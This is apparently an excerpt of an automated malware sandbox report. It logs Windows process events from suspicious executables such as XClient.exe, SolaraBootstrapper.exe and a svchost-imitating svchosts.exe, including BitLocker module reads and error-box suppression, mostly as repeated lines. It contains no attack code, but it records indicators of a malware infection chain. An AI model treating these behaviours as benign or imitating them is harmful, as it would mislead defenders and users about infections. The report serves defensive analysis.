Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5C6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00007FF76D5C6EA0

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
